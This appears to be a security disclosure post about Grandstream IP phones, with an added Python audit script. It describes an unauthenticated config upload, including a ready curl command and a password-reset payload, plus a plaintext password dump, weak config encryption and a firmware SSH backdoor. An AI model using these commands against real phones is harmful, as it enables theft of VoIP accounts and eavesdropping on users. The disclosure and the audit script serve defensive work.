I want to share a few serious vulnerabilities that I found in Grandstream handsets.
1. Upload an arbitrary config to the phone
While studying the web interface of the gxp21xx colour phones to learn their API, I came across a script for uploading a config to the phone: /cgi-bin/upload_cfg
Unlike the other scripts, this one is not passed a sessionid; only the file is passed. A quick check with curl showed that the script can indeed be used without authorization:
curl -i -F name="config.txt" -F file="@config.txt;type=text/plain" -H "Content-Disposition: form-data; name=file; filename=config.txt" http://xx.xx.xx.xx/cgi-bin/upload_cfg
config.txt is a text file containing parameters of the form parameter=value.
Filling the file with the single line "P2=admin" changes the admin password on the phone, after which we can log in to the web interface.
There are similar scripts on the phone for uploading a wallpaper, a phone book, etc.
This vulnerability is present in the gxp2130, gxp2140 and gxp2160 phones.
2. Dump the phone config
The next vulnerability is even worse than the first. I found it only after getting root access to the phone and going through the scripts in cgi-bin.
This is the /cgi-bin/dumpsettings script; here are its contents:
As you can see, this gem simply returns the output of nvram show | grep -v :STR without any authorization whatsoever. And nvram holds a lot of interesting parameters besides the config itself, including, of course, all the passwords in plain text: the admin password and the SIP accounts.
This vulnerability is present in most Grandstream devices (possibly all of them), including the gateways.
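The following is an added inventory check for the two unauthenticated scripts in sections 1 and 2; it is example code written for this page, not Grandstream's code and not from the original post. It probes only /cgi-bin/dumpsettings, because fetching it is read-only, whereas exercising /cgi-bin/upload_cfg would change the phone's configuration. It assumes the dumpsettings reply is plain name=value lines (the post says it is the output of nvram show | grep -v :STR) and that P2 is the admin password, as the post states; the sample reply is constructed, and the SIP parameter numbers in it (P47, P35, P34) are assumptions used only for illustration.

```python
import re
import socket
import urllib.request
from urllib.error import URLError

# Constructed sample of a dumpsettings reply, not captured from a real device.
# P2 (admin password) is named in the post; P47/P35/P34 are assumed parameter
# numbers (SIP server, SIP user ID, SIP auth password) used only for illustration.
SAMPLE_DUMP = """\
P2=admin
P47=sip.example.net
P35=1001
P34=s3cret
"""

# Parameters treated as credentials when reporting. P2 comes from the post;
# P34 is an assumption (SIP authentication password of the first account).
SENSITIVE = ("P2", "P34")

LINE_RE = re.compile(r"^(P\d+)=(.*)$")


def parse_dump(body: str) -> dict:
    """Parse 'Pnnn=value' lines into a dict, ignoring anything else (for
    example an HTML login page returned by a device that now demands a session)."""
    params = {}
    for line in body.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            params[m.group(1)] = m.group(2)
    return params


def is_exposed(body: str) -> bool:
    """True when the reply to an unauthenticated request contains P2, i.e. the
    admin password was handed out without a session."""
    return "P2" in parse_dump(body)


def redact(params: dict) -> dict:
    """Mask credential values so a scan report can be shared safely."""
    return {k: ("***" if k in SENSITIVE and v else v) for k, v in params.items()}


def probe(host: str, timeout: float = 5.0) -> dict:
    """GET /cgi-bin/dumpsettings with no session cookie and classify the result.

    Read-only: unlike upload_cfg, fetching dumpsettings changes nothing on the
    phone, so it is the safe script to use for an inventory check."""
    url = f"http://{host}/cgi-bin/dumpsettings"
    req = urllib.request.Request(url, headers={"User-Agent": "gs-audit"})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            body = resp.read().decode("utf-8", "replace")
    except (URLError, socket.timeout, OSError) as exc:
        return {"host": host, "reachable": False, "exposed": False, "error": str(exc)}
    return {
        "host": host,
        "reachable": True,
        "exposed": is_exposed(body),
        "params": redact(parse_dump(body)),
    }


def audit(hosts) -> list:
    """Probe each host and return the results, exposed devices first."""
    results = [probe(h) for h in hosts]
    return sorted(results, key=lambda r: not r["exposed"])


if __name__ == "__main__":
    import sys
    # Usage: python gs_audit.py 10.0.0.5 10.0.0.6 ...
    for r in audit(sys.argv[1:]):
        print(r)
```

A device that returns an HTML login page, or anything without P-parameters, is reported as not exposed; a device that answers with the raw nvram listing is flagged, and its credential fields are masked before the result is printed, so the report itself does not become a second copy of the leaked passwords.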
3. Encrypted config
Besides XML configs, during provisioning the phone can use an encrypted text configuration. The utility for creating such a config can be downloaded from the Grandstream website. The first alarming thing about this utility is that it does not ask for any encryption password. On the phone, the dec_config_dec utility is used to decrypt the config, and it needs nothing but the MAC address to do so. So decrypting the config is no problem at all. Yet some VoIP providers trust this encryption and leave such configs publicly accessible (for provisioning their customers' phones). By simply enumerating MAC addresses at one American VoIP provider, I was able to download about five hundred configs, each with a VoIP account inside.
4. A backdoor from Grandstream
I decided to look for backdoors in one of the firmware images. Reverse engineering the dropbear binary showed that it is possible to log in over SSH not only as the admin user but also as root, using a key. The public key is tucked away in the firmware at /rom/.ssh/authorized_keys
So whoever holds the private key can log in over SSH. And with root access to a phone you can, for example, listen in on calls, or simply listen to what is happening around the phone, even outside a call.
These vulnerabilities have more than one application:
- Plain theft of VoIP credentials
- Spoofing the caller's name through the phone book
- Substituting the SIP server in order to intercept traffic and eavesdrop
- Loading malicious software onto the phone's system, for example to record from the microphone or to launch attacks
On the Internet I found a large number of phones whose web interface is exposed, and on them the vulnerabilities listed above work just fine.
If you don't want to wait for new firmware with these holes closed (Grandstream support is very slow), you can cut the vulnerable scripts out of the firmware yourself, as described here.